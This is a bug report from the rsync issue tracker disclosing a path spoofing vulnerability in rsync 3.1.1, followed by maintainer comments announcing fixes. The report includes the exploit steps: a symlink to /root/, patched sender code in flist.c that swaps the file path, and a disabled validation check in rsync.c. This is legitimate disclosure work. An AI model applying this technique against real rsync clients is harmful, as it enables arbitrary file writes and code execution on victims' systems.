Bug 10977 - Rsync path spoofing attack vulnerability (rsync 3.1.1 tested)
Rsync path spoofing attack vulnerability (rsync 3.1.1 tested)
Product: rsync
Classification: Unclassified
Component: core
All Linux
: P5 critical
: ---
Assigned To: Wayne Davison
Rsync QA Contact
Depends on:
  Show dependency treegraph
Reported: 2014-12-01 07:04 UTC by gaojianfeng
Modified: 2015-07-07 17:47 UTC (History)
0 users

See Also:

Rsync path spoofing attack vulnerability (rsync 3.1.1 tested).pdf (Detailed documentation) (212.42 KB, application/pdf)
2014-12-01 07:04 UTC, gaojianfeng
no flags Details

Note You need to log in before you can comment on or make changes to this bug.
Description gaojianfeng 2014-12-01 07:04:35 UTC
Created attachment 10471 [details]
Rsync path spoofing  attack  vulnerability (rsync 3.1.1 tested).pdf (Detailed documentation)

Hi all    
    In newest version rsync(3.1.1),directly modify the file path into absolute path is
not hijack succeed due to the security checks,but using symbolic links still can bypass
security checks and spoofing client.When a client uses parameter -a to synchronize 
files of the server-side(default),for example:

rsync -avzP   /tmp/share

Rsync recursive synchronous all files,An attacker can hijack the file path  by modifying
the code of the server-side,allows remote  servers to write to arbitrary files, and 
consequently execute arbitrary code .

Vulnerability  Details : 
    Firstly,i write a following file into the shared folder in rsync:a true folder
 and a symbolic link are directed to the root directory .

[root@pentest rsync]# ls  -lh
total 8.0K
-rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
lrwxrwxrwx 1 root root    6 Oct 31 05:09 fakedir -> /root/
drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir

Then enter the truedir folder, create a new file  name "pwned".

[root@pentest rsync]# cd  truedir/
[root@pentest truedir]# ls
[root@pentest truedir]# echo rsync  test  >  pwned
[root@pentest truedir]# ls -lh
total 4.0K
-rw-r--r-- 1 root root 11 Oct 31 05:17 pwned
[root@pentest truedir]# 

Next I modify the server to send the file code,in the process of synchronizing,the path
of file "pwned" can be blocked and changed into any path.For example as follow code,change
true path  (truedir) to symbolic link (fakedir),this would put the Pwned file to download
to the symbolic link  points to the address (fakedir -> /root/).
file: flist.c    line:394

static void send_file_entry(int f, const char *fname, struct file_struct *file,
			    const char *symlink_name, int symlink_len,
			    int ndx, int first_ndx)
  if(strcmp(fname,"turedir/pwned") == 0){
  	fname="fakedir/pwned";  // symbolic link 
//change  file  true path(truedir) to  symbolic link  (fakedir)

Then, verification occurs in the server-side and says "received request to transfer
non-regular file fakedir/pwned.test 7 [sender]", But as an attacker, the code of the
server-side can be arbitrarily controlled,Shielding the following code.
file:rsync.c    line:405

/* if (iflags & ITEM_TRANSFER) {
		int i = ndx - cur_flist->ndx_start;
		if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
				"received request to transfer non-regular file: %d [%s]\n",
				ndx, who_am_i());

Vulnerability  Demo :

Online  test:
rsync -avvzP   /tmp/yaseng
Comment 1 Wayne Davison 2014-12-31 22:05:51 UTC
The latest git now has a fix for this exploit in an inc-recursive transfer (the default).  See commit: 962f8b90045ab331fc04c9e65f80f1a53e68243b

A transfer with --no-inc-recursive set (or an option that implies it) will sort the filenames wrong, so it would take some more malicous-sender helper code to deal with that, but it should be possible.  I'll be looking at how best to deal with that code path next.
Comment 2 Wayne Davison 2015-07-07 17:47:09 UTC
The code now also fixes the --no-inc-recursive code, which resolves all aspects of this issue.  I will release 3.1.2 soon.  Thanks for the report!